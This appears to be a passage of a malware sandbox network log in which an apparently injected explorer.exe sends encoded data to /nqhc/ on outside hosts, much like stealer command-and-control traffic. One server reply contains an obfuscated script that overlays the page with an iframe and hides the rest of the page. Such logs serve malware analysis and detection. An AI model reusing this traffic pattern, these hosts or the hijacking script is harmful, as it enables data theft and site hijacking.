                                                                                                                                                                          Data Ascii: pJErf3HxfKhpgTlxQ-3_mflUgoLTKP6MFzYh6EC-OkizQ2kQC416aofk1H0ifttczkTvas3UaJL7ri8yo5IlhvBrT6Vkana0XrRRlyYd3nCh2uhJf-hTxf6jtLfMHVwTVPw6qlAJ2IIzGvtAgU1M(lPXXsRU3H1U557dS6m2wAKKRpwcGLA_C_061SSirrJ7d_RrU9~TPq4MojkF1wPc2S~goWSyIoACzY8sl9SNJDVute9muWP
                                                                                                                                                                          Dec 5, 2022 15:19:42.755868912 CET12729OUTData Raw: 77 5a 63 35 6f 4d 76 50 37 64 37 61 4c 39 36 48 4f 38 75 62 46 68 47 46 4c 31 34 42 64 59 62 79 4e 63 75 6a 6a 4b 61 49 47 54 69 71 57 49 55 6a 48 6b 46 46 63 31 51 5f 38 75 38 37 70 4c 33 56 4e 5f 6b 52 77 63 51 6c 35 64 52 50 6e 47 4c 7a 43 5a
                                                                                                                                                                          Data Ascii: wZc5oMvP7d7aL96HO8ubFhGFL14BdYbyNcujjKaIGTiqWIUjHkFFc1Q_8u87pL3VN_kRwcQl5dRPnGLzCZQA6gcLe1EIibAfFOIR1j0kiIXZKAf6hYeEMLgUy3jf0oUX0ySvSvq1rphdefUA9AFbmorI8DaAzfP-uMqw~K8HPzPmQT81PYi9LgEAkHZutuMu2e3To0EUj85ShMtXgzLtd-U0Rn4LzUYjdCtfHcj9yX0kt674PO8
                                                                                                                                                                          Dec 5, 2022 15:19:42.756042957 CET12734OUTData Raw: 62 39 44 74 31 69 62 45 31 35 62 48 51 33 4c 50 35 34 65 45 31 6a 48 44 35 72 53 75 45 78 7a 34 38 31 4c 43 38 6e 64 48 4a 56 6b 32 52 5a 70 6c 6c 78 50 2d 33 69 66 37 48 72 6f 6f 4d 61 68 5f 45 6d 61 6c 76 6e 33 30 34 63 72 77 52 71 6f 32 54 71
                                                                                                                                                                          Data Ascii: b9Dt1ibE15bHQ3LP54eE1jHD5rSuExz481LC8ndHJVk2RZpllxP-3if7HrooMah_Emalvn304crwRqo2TqGXYoPO~-jPuDgNVsh2AqKbdVv9HIUUjxAbwQTgbJkB3DyXcvAGRJ5MoWxeLf~Sp3HI2hNrn_qtT0WzpfFfJ2Dn8ZMd20e5vtiYSIViD6mwMCN5E3VcwW4f0OdICJ2z(GhtEPPkvOv-NVXmbk4va5VS7YFnQkIdDG3
                                                                                                                                                                          Dec 5, 2022 15:19:43.006995916 CET12738OUTData Raw: 65 69 49 30 57 47 75 77 54 65 6e 6b 72 2d 66 52 6a 70 4b 46 41 56 6e 42 4e 36 37 77 6f 71 62 35 61 67 37 75 53 30 7a 69 6c 52 4e 50 5a 58 65 59 4b 63 6d 38 57 30 6b 50 34 74 4c 72 48 65 6e 64 72 44 47 73 39 69 6d 35 30 54 4b 69 33 4c 54 6d 63 63
                                                                                                                                                                          Data Ascii: eiI0WGuwTenkr-fRjpKFAVnBN67woqb5ag7uS0zilRNPZXeYKcm8W0kP4tLrHendrDGs9im50TKi3LTmcc1GEdzjKytr(tl2RAUPkgo1BVuFi1pdz1dRC2xEpd6vK5V_uzXIhOz2RpK10-ilv3UyMcmGomrfVR6dlG4GjnnMXrgY(OOSMJvk(Gbq2GD711g4LDRjygYtOVbd8tUYvAxUQG3XEaqIadyXq6Hu7etN(qAzetF_VnD
                                                                                                                                                                          Dec 5, 2022 15:19:43.007101059 CET12748OUTData Raw: 28 34 30 77 68 65 68 4f 75 2d 57 4c 70 4c 31 4d 37 32 42 4e 4e 33 48 4a 75 55 32 5f 73 5f 41 6e 76 4a 44 6b 32 62 32 7a 28 6f 4d 31 4d 36 61 34 51 74 32 30 43 32 38 5a 7e 69 39 55 7a 65 75 37 4d 6d 70 72 34 36 4b 77 68 6c 7a 51 38 51 45 66 61 69
                                                                                                                                                                          Data Ascii: (40whehOu-WLpL1M72BNN3HJuU2_s_AnvJDk2b2z(oM1M6a4Qt20C28Z~i9Uzeu7Mmpr46KwhlzQ8QEfaiLEXUzSNaZbT6rDgivN(uXH~barHHxYquYkbmHHw0AST846gFL8eBGwcbgS786p7CGSzwEXp2X505ZqhOPDAUvVEkVQn_RiPjk_ns(Xppr6O8htkvNdE9Q1ABYjQd0R7AfHpkBCpB4kYPi3trvs98iAgegjUuWlsuC


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          83192.168.11.2049938103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:44.781097889 CET12749OUTGET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:19:45.032748938 CET12750INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:44 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 1741
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: "634bbb43-6cd"
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 63 61 74 63 68 28 65 29 7b 7d 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 74 72 79 7b 76 61 72 20 74 61 67 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 74 61 67 4e 61 6d 65 3b 76 61 72 20 6d 79 69 64 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 69 64 3b 69 66 28 6d 79 69 64 21 3d 22 69 63 6f
                                                                                                                                                                          Data Ascii: <html><head><meta charset="UTF-8"/><title>404 Not Found</title><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><link rel="icon" type="image/x-icon" href="http://45.122.138.45/favicon.ico"><script>document.writeln('');var ss='<div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="100%" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#52;&#53;&#46;&#49;&#50;&#50;&#46;&#49;&#51;&#56;&#46;&#52;&#53;&#47;"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';eval("document.write('"+ss+"');");try{setInterval(function(){try{document.getElementById("divAll").style.display="none"}catch(e){}for(var i=0;i<document.body.children.length;i++){try{var tagname=document.body.children[i].tagName;var myid=document.body.children[i].id;if(myid!="ico
                                                                                                                                                                          Dec 5, 2022 15:19:45.032840967 CET12751INData Raw: 6e 44 69 76 31 22 26 26 6d 79 69 64 21 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 29 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65
                                                                                                                                                                          Data Ascii: nDiv1"&&myid!="showcloneshengxiaon"){document.body.children[i].style.display="none"}}catch(e){}}},100)}catch(e){}</script><script>(function(){var bp=document.createElement('script');var curProtocol=window.location.protocol.split(':')[0];if(cur


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          84192.168.11.204994166.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:58.280198097 CET12777OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 69 47 6b 58 47 74 4d 66 67 68 50 53 46 6d 38 41 36 78 53 4d 69 73 75 55 64 45 71 66 6c 7a 51 7a 4c 76 38 51 6b 57 70 4f 7a 6e 4c 73 73 6f 28 32 67 50 61 6f 32 2d 28 7a 33 5a 6e 6d 39 4d 6f 6f 49 54 55 51 6d 66 6d 4d 32 39 77 75 7a 48 73 6d 51 31 41 73 53 54 52 34 77 4a 68 4f 6c 55 4f 41 52 56 74 32 32 55 52 66 59 6d 69 72 47 63 33 5a 30 6e 4e 44 51 63 56 4b 48 4c 45 38 46 68 55 58 79 4d 62 6f 43 47 6a 75 37 37 39 63 75 30 4e 7a 7e 77 6c 30 68 49 45 69 62 79 4b 55 4c 49 4e 44 73 67 75 6a 6a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEiGkXGtMfghPSFm8A6xSMisuUdEqflzQzLv8QkWpOznLsso(2gPao2-(z3Znm9MooITUQmfmM29wuzHsmQ1AsSTR4wJhOlUOARVt22URfYmirGc3Z0nNDQcVKHLE8FhUXyMboCGju779cu0Nz~wl0hIEibyKULINDsgujjg).
                                                                                                                                                                          Dec 5, 2022 15:19:58.593535900 CET12778INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:58 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          85192.168.11.204994266.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:00.467168093 CET12779OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 30 7a 49 4b 59 51 32 44 46 4f 77 6e 4c 73 7e 49 28 33 76 76 62 6d 32 35 32 4f 33 64 6e 6d 39 49 34 6f 49 67 73 51 33 5f 6d 50 39 64 77 70 30 48 73 6c 62 56 41 6d 53 54 64 56 77 49 6c 4f 6c 46 69 41 51 58 46 32 79 41 46 63 64 47 69 70 54 4d 33 59 7e 48 4e 6b 51 63 6f 31 48 4b 74 48 45 54 49 58 79 73 37 6f 51 57 6a 68 68 37 38 55 78 45 4d 74 78 69 45 62 6d 70 45 4b 4d 51 61 7a 4b 72 51 51 76 6b 47 70 28 4c 4f 6a 71 6d 59 78 4f 79 58 5f 33 67 42 44 4d 64 6a 41 57 33 69 50 48 54 39 67 4f 52 4f 36 68 6a 38 63 75 4d 53 6b 34 34 4d 6d 63 72 79 41 5a 45 37 57 65 4a 6b 4b 28 78 79 68 62 71 48 79 4b 6c 74 30 58 63 34 53 62 44 42 38 70 62 77 49 74 79 52 6f 78 4d 52 77 7a 32 65 71 56 5a 4b 37 58 31 32 61 51 67 58 6a 57 5a 67 68 6f 37 30 6c 6b 61 66 65 32 34 4a 58 67 37 68 7a 70 56 35 4f 4e 51 4e 41 33 72 38 71 4a 34 46 46 7e 54 6a 74 4a 55 59 6c 36 47 31 45 73 63 7e 5f 46 48 61 39 73 4c 65 72 76 2d 42 4c 36 44 33 6c 4f 77 79 5f 48 62 7a 6a 42 56 39 46 6a 4c 52 63 4b 61 65 71 6a 70 73 47 76 76 69 66 51 68 7e 38 56 30 75 75 63 33 48 69 38 5a 32 4c 43 78 4a 7a 30 36 43 75 35 31 43 67 77 66 34 76 73 36 4c 75 45 41 7e 4e 71 35 62 43 70 61 38 6d 58 7a 4e 31 75 48 76 4d 38 71 46 6a 61 4c 35 75 41 74 6e 77 71 30 67 35 49 58 79 50 5a 45 61 33 6c 46 32 42 70 64 77 50 7a 58 41 7a 67 38 58 57 54 79 4e 41 59 6d 67 30 54 4d 75 68 41 55 55 73 46 7a 6e 43 67 75 6b 44 78 48 49 79 37 6d 39 2d 7e 6a 6a 66 48 58 6a 58 74 73 30 67 78 73 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB0zIKYQ2DFOwnLs~I(3vvbm252O3dnm9I4oIgsQ3_mP9dwp0HslbVAmSTdVwIlOlFiAQXF2yAFcdGipTM3Y~HNkQco1HKtHETIXys7oQWjhh78UxEMtxiEbmpEKMQazKrQQvkGp(LOjqmYxOyX_3gBDMdjAW3iPHT9gORO6hj8cuMSk44MmcryAZE7WeJkK(xyhbqHyKlt0Xc4SbDB8pbwItyRoxMRwz2eqVZK7X12aQgXjWZgho70lkafe24JXg7hzpV5ONQNA3r8qJ4FF~TjtJUYl6G1Esc~_FHa9sLerv-BL6D3lOwy_HbzjBV9FjLRcKaeqjpsGvvifQh~8V0uuc3Hi8Z2LCxJz06Cu51Cgwf4vs6LuEA~Nq5bCpa8mXzN1uHvM8qFjaL5uAtnwq0g5IXyPZEa3lF2BpdwPzXAzg8XWTyNAYmg0TMuhAUUsFznCgukDxHIy7m9-~jjfHXjXts0gxs8.
                                                                                                                                                                          Dec 5, 2022 15:20:00.757002115 CET12780INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:00 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          86192.168.11.204994366.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:02.660803080 CET12786OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 38 7a 4c 38 55 51 6b 30 78 4f 78 6e 4c 73 6c 49 28 79 76 76 62 72 32 5f 66 4a 33 64 72 51 39 4f 6b 6f 49 7a 45 51 33 4b 79 50 34 64 77 6f 37 6e 73 6e 51 31 41 79 53 54 52 61 77 49 67 31 6c 55 57 41 52 58 31 32 32 79 74 66 54 32 69 72 54 4d 33 63 36 48 4e 7a 51 63 74 6f 48 4b 68 48 45 52 38 58 7a 66 44 6f 44 31 62 68 31 62 38 56 6f 30 4e 74 34 43 45 36 6d 70 67 65 4d 51 61 46 4b 70 38 51 76 6a 79 70 7e 4d 36 69 70 47 59 78 51 43 58 34 7a 68 39 48 4d 64 76 75 57 33 57 50 48 52 74 67 4e 78 4f 36 6b 43 38 66 34 38 53 69 79 59 4e 67 57 4c 75 49 5a 41 54 43 65 49 41 4b 34 42 6d 68 61 5a 76 79 4d 48 4a 30 65 63 34 51 47 7a 42 76 6a 37 77 55 74 79 41 42 78 50 5a 61 7a 30 79 71 45 4c 53 37 54 55 32 56 48 77 57 71 61 35 68 37 73 37 78 6b 6b 61 75 66 32 34 4a 35 67 2d 52 7a 75 6b 4a 4f 4f 52 4e 48 30 37 39 44 42 59 45 48 30 7a 76 33 4a 55 73 39 36 46 31 55 73 64 32 5f 47 6e 61 39 75 73 4b 71 6c 4f 42 4d 6c 7a 32 71 54 67 79 57 48 63 37 4a 42 51 46 5f 69 34 46 63 4a 4f 36 71 70 5a 73 46 72 50 69 62 57 52 7e 2d 65 55 75 75 63 77 4f 62 38 5a 79 4c 43 6b 74 7a 30 4e 6d 75 70 32 61 67 32 66 34 74 73 36 4c 7a 45 41 69 45 71 35 43 56 70 61 73 41 58 77 39 31 75 57 28 4d 28 76 78 67 66 37 35 6e 53 64 6d 6f 31 6b 38 75 49 58 75 48 5a 41 47 34 6b 33 69 42 6f 64 41 50 69 48 41 79 79 73 58 56 62 53 4e 61 4a 32 63 53 54 4d 7a 55 41 55 49 47 46 30 62 43 73 70 51 55 32 6d 49 6b 76 77 68 72 34 47 76 76 48 52 6a 71 33 75 6f 52 6d 62 53 4d 41 54 44 71 78 61 78 56 4b 61 76 62 6e 32 34 2d 59 52 39 52 49 76 68 5f 28 6a 41 43 7a 39 72 6c 6d 6a 52 53 62 61 70 54 51 51 42 4e 77 76 44 79 7a 33 6d 35 7e 46 45 4d 6f 31 65 61 35 59 76 50 73 4a 4b 4e 4c 61 30 50 64 52 68 7a 52 65 69 72 63 69 37 4e 45 72 74 30 7a 41 72 2d 71 6a 6d 75 64 45 33 4c 43 66 42 41 43 52 53 4f 53 73 77 4d 55 32 59 61 52 71 5a 65 33 65 42 34 6e 34 6c 6e 31 66 33 66 43 5f 72 74 44 36 4c 4b 28 74 75 6f 42 5f 30 61 